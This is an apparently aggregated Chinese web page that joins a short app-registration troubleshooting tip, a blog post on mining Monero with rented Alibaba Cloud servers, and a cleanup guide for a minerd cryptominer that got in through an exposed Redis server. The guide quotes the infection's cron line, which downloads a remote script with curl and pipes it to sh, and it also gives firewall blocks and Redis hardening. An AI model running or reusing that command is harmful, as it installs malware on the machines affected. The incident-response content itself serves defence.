xmrth注册不了

xmrth注册不了,第1张

网络的问题。注册不了多数是网络连接异常导致。

1、首先打开电脑检查网络。

2、其次打开xmrth应用软件进行测试网络连接是否异常。

3、最后点击xmrth软件重新进入注册即可。

三天以前看到壮乡金荣仔的文章,从中了解到可以利用阿里云服务器进行挖矿收益可观,于是立即和作者进行了联系,咨询拜师的事情。

通过和孙师傅交流发现,因为写作让我们有了很多共同交流的基础,并且我居然已经关注了孙师傅有好几个月的时间了,这让我们很快建立了信任。

孙师傅在文章中提到正式收徒弟还要等一段时间,我觉得这段时间也不能浪费,还应该为将来拜师以后做一点准备工作。于是我立即开始对云服务挖矿这件事情进行了认真的思考并实践。

云服务挖矿的可行性,大概有这么几个方面。

一,云服务器挖矿的成本收益分析。

成本构成:挖矿的成本主要有三项,矿机的支出,电费,场地及相关管理费用;

收益构成:挖矿的收益主要来自两个方面,一是按照当前数字货币的法币价格可以不管成本而获得的收益,二是数字货币在未来增值获得的收益。

分析:云服务器的运算能力远远低于实体矿机,但是不用支付电费,这是最大的成本节省,另外,由于不需要场地,自己远程管理,场地和管理费用也趋近于零。

因此在算力有限的情况下,云服务器挖矿最大限度地消除了电费和场地的费用,这是这项技术的优势所在。而盈利的平衡点,将极大的取决于服务器费用的支出和当前币价的相对关系。

二,云服务器和挖矿币种的分析。

云服务器的种类有很多,主要分两种,CPU型和GPU型。

目前市场上的各种虚拟币算法也分两类,GPU友好型和CPU有好型。比特币以太坊,莱特币等绝大多数币种都属于GPU友好型,CPU友好型比较少,我了解到的只有大零币zec,小零币xzc,门罗币xmr。

所以这样一来,在服务器和币种的选择问题上,方向很清晰:CPU和GPU任何一个方向,选择算力性价比最高的云服务器和挖矿收益最高的币种。

三,实践。

李笑来的文章中提到过,任何挖矿的行为都不如直接到市场上去买来得容易。我也因此在之前的虚拟货币的学习中,很少关注挖矿的知识。同时对于服务器方面的知识也了解很少,所以一开始我只能用网络上能够搜索得到的办法进行实践, 以快速入门,开始积累。

网上能够直接搜索到的就是利用CPU服务器挖掘门罗币。文章链接如下。

于是我花了391.5元购买了三个月的阿里云轻量型服务器,配置如下。阿里云目前在搞活动,首单可以打七折。

开始进行实践。

经过了两天的折腾,终于在运行服务器上挖矿成功,但是算力只有140h/s,在这个算力下,要亏本一半。

具体折腾的过程中,遇到坑无数,也麻烦了我搞计算机的朋友很多,这个过程留待下一篇再写吧。

四,关于风险的思考。

目前来看,用云服务器挖矿服务器的价格是预付的,并且是固定的,所以挖矿是否有收益,取决于目前的虚拟货币的价格。从孙师傅的截图来看,目前收益还是很可观的。

近期的风险来自于币价的下跌,远期的风险来看,就是阿里云服务器会禁止挖矿行为。阿里云对于挖矿的行为,在网上有过很多的声明。在搜索服务器挖矿相关知识的时候,也发现有国外的服务器禁止挖矿。

长期来看,如果目前云服务器挖矿不赔本那么未来大概率是会有很大的收益的。

就在写这一篇的过程中,孙师傅的收徒标也发出来了,很快就要收徒弟啦。我也正好把这一篇当做我第一这周的作业。

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/472223.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-06-06
下一篇2023-06-06

发表评论

登录后才能评论

评论列表(0条)

    保存